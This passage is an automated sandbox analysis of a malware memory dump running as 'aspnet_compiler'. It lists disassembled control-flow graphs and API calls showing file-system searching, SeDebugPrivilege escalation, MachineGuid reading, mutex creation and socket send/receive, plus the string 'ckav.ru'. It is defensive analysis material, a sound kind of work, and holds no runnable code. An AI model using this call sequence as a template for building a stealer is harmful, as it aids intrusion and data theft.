                                        control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 161 403dd1-403dd8 151->161 162 403e9d-403ea4 call 402bab 151->162 155 403f97-403f9d 152->155 159 403ee8-403ef8 call 405d24 153->159 160 403f8e-403f94 call 402bab 153->160 176 403f03-403f0a 159->176 177 403efa-403f01 159->177 160->152 166 403e75-403e90 call 4031e5 FindNextFileW 161->166 167 403dde-403de2 161->167 162->150 166->161 180 403e96-403e97 call 403bef 166->180 168 403e12-403e22 call 405d24 167->168 169 403de4-403df9 call 405eff 167->169 189 403e30-403e4c call 405b6f 168->189 190 403e24-403e2e 168->190 169->166 186 403dfb-403e10 call 405eff 169->186 182 403f12-403f2d call 405b6f 176->182 183 403f0c-403f10 176->183 177->176 181 403f41-403f5c call 4031e5 FindNextFileW 177->181 193 403e9c 180->193 196 403f87-403f88 call 403bef 181->196 197 403f5e-403f61 181->197 182->181 199 403f2f-403f33 182->199 183->181 183->182 186->166 186->168 189->166 204 403e4e-403e6f call 403d74 call 402bab 189->204 190->166 190->189 193->162 205 403f8d 196->205 197->159 202 403f75-403f85 call 402bab call 403bef 199->202 203 403f35-403f36 call 40fa23 199->203 202->155 209 403f39-403f40 call 402bab 203->209 204->166 217 403f63-403f73 call 402bab call 403bef 204->217 205->160 209->181 217->155
                                        APIs
                                        • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                        • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                        • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                        • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileFind$FirstNext
                                        • String ID: %s\%s$%s\*$Program Files$Windows
                                        • API String ID: 1690352074-2009209621
                                        • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                        • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                        • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                        • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                        • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                        • String ID: SeDebugPrivilege
                                        • API String ID: 3615134276-2896544425
                                        • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                        • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                        • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                        • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                        • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcess
                                        • String ID:
                                        • API String ID: 1357844191-0
                                        • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                        • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                        • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                        • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                        APIs
                                        • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: recv
                                        • String ID:
                                        • API String ID: 1507349165-0
                                        • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                        • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                        • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                        • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 232 406201-406203 229->232 233 406208-406228 call 4060ac call 4031e5 229->233 237 40624c-406258 call 402b7c 230->237 238 40623d-406249 call 40338c 230->238 235 406329-40632e 232->235 233->230 233->232 246 406269-406290 call 4031e5 GetTokenInformation 237->246 247 40625a-406266 call 40338c 237->247 238->237 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 262 4062a2-4062b9 call 406086 253->262 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 263 40630c 256->263 260 406311-406317 call 402bab 257->260 261 406318-40631e 257->261 260->261 265 406320-406326 call 402bab 261->265 266 406327 261->266 272 4062f5-4062fd call 402bab 262->272 273 4062bb-4062e4 call 4031e5 262->273 263->257 265->266 266->235 272->254 273->272 279 4062e6-4062ec call 405b6f 273->279 281 4062f1-4062f3 279->281 281->272
                                        APIs
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                        • _wmemset.LIBCMT ref: 00406244
                                        • _wmemset.LIBCMT ref: 00406261
                                        • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _wmemset$ErrorInformationLastToken
                                        • String ID: IDA$IDA
                                        • API String ID: 487585393-2020647798
                                        • Opcode ID: d0395f9089772e9078c0cbeb7e7a69d574c5e4bdcef80e12950fd19a5f1576fd
                                        • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                        • Opcode Fuzzy Hash: d0395f9089772e9078c0cbeb7e7a69d574c5e4bdcef80e12950fd19a5f1576fd
                                        • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 554 404ec7-404ec9 542->554 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 548 404ec0-404ec6 call 402bab 545->548 549 404ecb 545->549 546->545 548->554 553 404ecd-404ece 549->553 553->539 554->553
                                        APIs
                                        • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                        • socket.WS2_32(?,?,?), ref: 00404E7A
                                        • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: freeaddrinfogetaddrinfosocket
                                        • String ID:
                                        • API String ID: 2479546573-0
                                        • Opcode ID: d0cbd2bfe5b0935c94ba089aae0b4a72727b205c69b8882af43eb62a71f59e55
                                        • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                        • Opcode Fuzzy Hash: d0cbd2bfe5b0935c94ba089aae0b4a72727b205c69b8882af43eb62a71f59e55
                                        • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 571 404113-404119 559->571 572 40417a 559->572 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 568 4041a9-4041b8 call 403c59 562->568 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 568->576 577 4041db-4041e4 call 402bab 568->577 571->572 575 40411b-404120 571->575 574 40417d-40417e call 403c40 572->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->572 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$AllocCreateReadVirtual
                                        • String ID: .tmp
                                        • API String ID: 3585551309-2986845003
                                        • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                        • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                        • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                        • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                        APIs
                                        • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                        • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                        • GetLastError.KERNEL32 ref: 0041399E
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Error$CreateLastModeMutex
                                        • String ID:
                                        • API String ID: 3448925889-0
                                        • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                        • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                        • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                        • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                        • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CreatePointerWrite
                                        • String ID:
                                        • API String ID: 3672724799-0
                                        • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                        • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                        • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                        • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                        APIs
                                        • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                          • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                          • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                          • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$CreateFreeProcessThread_wmemset
                                        • String ID: ckav.ru
                                        • API String ID: 2915393847-2696028687
                                        • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                        • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                        • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                        • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                        APIs
                                          • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                          • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                        • _wmemset.LIBCMT ref: 0040634F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcess_wmemset
                                        • String ID: CA
                                        • API String ID: 2773065342-1052703068
                                        • Opcode ID: cab46f4d188c0a5189c49f3585cfa10eddaab0cbfa80d2b27664b61f9bed3b3c
                                        • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                        • Opcode Fuzzy Hash: cab46f4d188c0a5189c49f3585cfa10eddaab0cbfa80d2b27664b61f9bed3b3c
                                        • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                        APIs
                                        • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InformationToken
                                        • String ID: IDA
                                        • API String ID: 4114910276-365204570
                                        • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                        • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                        • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                        • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                        APIs
                                        • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc
                                        • String ID: s1@
                                        • API String ID: 190572456-427247929
                                        • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                        • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                        • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                        • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                        APIs
                                          • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                          • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                        • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                        • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 1425999871-0
                                        • Opcode ID: 18f61375b21b2ca1c3d5cfb75848ec819ade9bcc4ac2f6c13c281ff8ddb16e17
                                        • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                        • Opcode Fuzzy Hash: 18f61375b21b2ca1c3d5cfb75848ec819ade9bcc4ac2f6c13c281ff8ddb16e17
                                        • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                        APIs
                                        • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CheckMembershipToken
                                        • String ID:
                                        • API String ID: 1351025785-0
                                        • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                        • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                        • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                        • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                        APIs
                                        • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateDirectory
                                        • String ID:
                                        • API String ID: 4241100979-0
                                        • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                        • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                        • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                        • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                        APIs
                                        • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoNativeSystem
                                        • String ID:
                                        • API String ID: 1721193555-0
                                        • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                        • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                        • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                        • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                        APIs
                                        • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: send
                                        • String ID:
                                        • API String ID: 2809346765-0
                                        • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                        • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                        • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                        • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                        APIs
                                        • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileMove
                                        • String ID:
                                        • API String ID: 3562171763-0
                                        • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                        • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                        • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                        • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                        APIs
                                        • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Startup
                                        • String ID:
                                        • API String ID: 724789610-0
                                        • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                        • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                        • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                        • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                        APIs
                                        • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                        • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                        • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                        • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                        APIs
                                        • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Open
                                        • String ID:
                                        • API String ID: 71445658-0
                                        • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                        • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                        • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                        • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                        APIs
                                        • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
